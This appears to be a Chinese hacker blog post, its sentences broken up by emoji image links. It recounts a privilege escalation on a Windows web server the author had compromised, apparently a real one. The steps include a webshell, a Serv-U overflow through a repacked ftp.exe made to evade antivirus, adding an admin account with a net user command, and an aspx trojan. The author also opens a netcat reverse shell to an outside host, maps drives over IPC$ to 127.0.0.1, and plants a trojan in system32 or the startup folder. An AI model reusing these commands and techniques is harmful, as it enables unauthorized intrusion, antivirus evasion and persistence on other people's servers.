我用
![](/icons/37091de.gif)
是海洋2006,得到webshell后
![](/icons/37091dou.gif)
首先想到
![](/icons/37091de.gif)
就是提权了
![](/icons/37091dou.gif)
呵呵
![](/icons/37091dou2.gif)
服务器各个目录权限设置得不错 ..
打开"WScript.Shell
![](/icons/37091chengxu.gif)
运行器"
![](/icons/37091dou.gif)
随便输入
![](/icons/37091yi.gif)
个命令
![](/icons/37091dou.gif)
提示:".. .. 拒绝访问,缺少对象"
![](/icons/37091dou.gif)
使用WS组件
![](/icons/37091dou.gif)
输入命令也提示:"拒绝访问"
![](/icons/37091dou.gif)
哎~~~ 看来有心啊..不过
![](/icons/37091dou.gif)
可以自己上传
![](/icons/37091yi.gif)
个cmd.exe玩玩...还好FSO没有删掉
![](/icons/37091dou.gif)
可以到处逛逛
![](/icons/37091dou.gif)
不过没什么用...
准备开始提权.gogo~~
从"系统服务信息"中
![](/icons/37091dou.gif)
得到对方有serv-u服务
![](/icons/37091dou.gif)
那就用溢出
![](/icons/37091dou.gif)
成功上传了cmd.exe,ftp.exe,新
![](/icons/37091dou.gif)
cmd.exe还在,ftp.exe消失了
![](/icons/37091dou.gif)
可以判断对方服务器中有杀毒软件Software,然后自己建了
![](/icons/37091yi.gif)
个空
![](/icons/37091de.gif)
.bat文件
![](/icons/37091dou.gif)
把ftp.exe文件为主和此bat捆绑起来
![](/icons/37091dou.gif)
再加壳,(个人认为这样效果好) 生成另
![](/icons/37091yi.gif)
个ftp.exe
![](/icons/37091dou.gif)
然后上传
![](/icons/37091dou.gif)
新没有被杀
![](/icons/37091dou.gif)
直接执行ftp.exe "net user test test /add" 显示成功
![](/icons/37091dou.gif)
看来确实可以溢出
![](/icons/37091dou.gif)
汗 - -;;,正当得意时
![](/icons/37091dou.gif)
ftp.exe又被杀了
![](/icons/37091dou2.gif)
![](/icons/37091dou2.gif)
不过
![](/icons/37091dou.gif)
用如上思路方法再次上传成功
![](/icons/37091dou.gif)
而且成功添加了管理员
![](/icons/37091dou.gif)
然后再次被杀!无所谓
![](/icons/37091dou.gif)
![](/icons/37091yinwei.gif)
当时想可以用如上思路方法再次执行命令
![](/icons/37091dou.gif)
不过
![](/icons/37091dou.gif)
发现再也不能上传
![](/icons/37091dou.gif)
![](/icons/37091yi.gif)
上传就马上被杀!可能杀毒软件Software变“精”了?上面得到了管理员用户
![](/icons/37091dou.gif)
通过2步自己都觉得纯属侥幸,有点戏剧性 ^_^
对方什么也没有开...3389,5631..ai..如果开
![](/icons/37091de.gif)
话
![](/icons/37091dou.gif)
此提权就已经结束
![](/icons/37091dou.gif)
还是需要自己开..但是上面所说
![](/icons/37091de.gif)
溢出已经over....
查看"系统用户及用户组信息"突然发现里面有
![](/icons/37091yi.gif)
个asp.net用户
![](/icons/37091dou.gif)
哈哈
![](/icons/37091dou.gif)
希望我所在网站WebSite目录可以支持aspx,上传了aspx木马后
![](/icons/37091dou.gif)
随着状态栏
![](/icons/37091yi.gif)
点
![](/icons/37091yi.gif)
点打开
![](/icons/37091dou.gif)
成功载入了
![](/icons/37091dou.gif)
aspx木马可以执行
![](/icons/37091dou.gif)
爽~~~
![](/icons/37091yinwei.gif)
此aspx具有users组用户权限
![](/icons/37091dou.gif)
也就是说
![](/icons/37091dou.gif)
可以执行
![](/icons/37091yi.gif)
般可执行文件.
上传nc.exe
![](/icons/37091dou.gif)
本地监听nc.exe -v -l -p 3300,aspx木马中执行nc.exe xxx.xxx.xxx.xxx 3300,进行反向连接
![](/icons/37091dou.gif)
于是本地成功获得了
![](/icons/37091yi.gif)
个具有users权限
![](/icons/37091de.gif)
cmdshell
![](/icons/37091dou2.gif)
下来
![](/icons/37091de.gif)
提权可是费了不少时间
![](/icons/37091dou.gif)
不过
![](/icons/37091dou.gif)
最后还是从net start里
![](/icons/37091dou.gif)
发现了有server服务
![](/icons/37091dou.gif)
想了想
![](/icons/37091dou.gif)
我在服务器中有管理员用户和密码
![](/icons/37091dou.gif)
而且自己正在
![](/icons/37091de.gif)
是服务器
![](/icons/37091de.gif)
users组
![](/icons/37091de.gif)
cmdshell中,
可不可以自己连接自己提权呢...
在cmdshell中输入net use \\127.0.0.1\ipc$ "test" /user:"test" 提示命令成功. 我晕..爽了..
服务器里只有2个盘,c:\和d:\
c:\为系统盘 d:\为网站WebSite所在盘
命令如下:
net use m: \\127.0.0.1\c$
net use n: \\127.0.0.1\d$
然后把木马上传到网站WebSite盘也就是说d:\ 那么就在n:\这个映射盘里
通过copy n:\web\xxx\xxx\木马.exe m:\winnt\system32\下面
也就是把D:\盘
![](/icons/37091de.gif)
木马copy到了C:\盘下面
也可以copy到启动项中,想如何玩就如何玩.
![](/icons/37091yinwei.gif)
相于你来说c:\和d:\对你来说是everyone权限..
当时运气差了点
![](/icons/37091dou.gif)
没有计划任务没有启动,所以不能用at.exe定时执行
![](/icons/37091chengxu.gif)
....
可能有人要问
![](/icons/37091dou.gif)
为什么不在自己
![](/icons/37091de.gif)
机器上
![](/icons/37091dou.gif)
直接连接服务器
![](/icons/37091de.gif)
ipc$呢
![](/icons/37091dou.gif)
:)
![](/icons/37091dou.gif)
![](/icons/37091yinwei.gif)
对方有防火墙
![](/icons/37091dou.gif)
根本连不上
![](/icons/37091dou.gif)
如果"自己连自己
![](/icons/37091de.gif)
话"是没问题
![](/icons/37091de.gif)
![](/icons/37091dou2.gif)
好了
![](/icons/37091dou.gif)
提权告以段落
![](/icons/37091dou.gif)
这是2个月前
![](/icons/37091de.gif)
事情了
![](/icons/37091dou.gif)
认为还比较有意思 :)
上
篇文章: 推荐:截杀Session入后台拿Shell
下
篇文章: 浅谈入侵后对硬件
破坏思路方法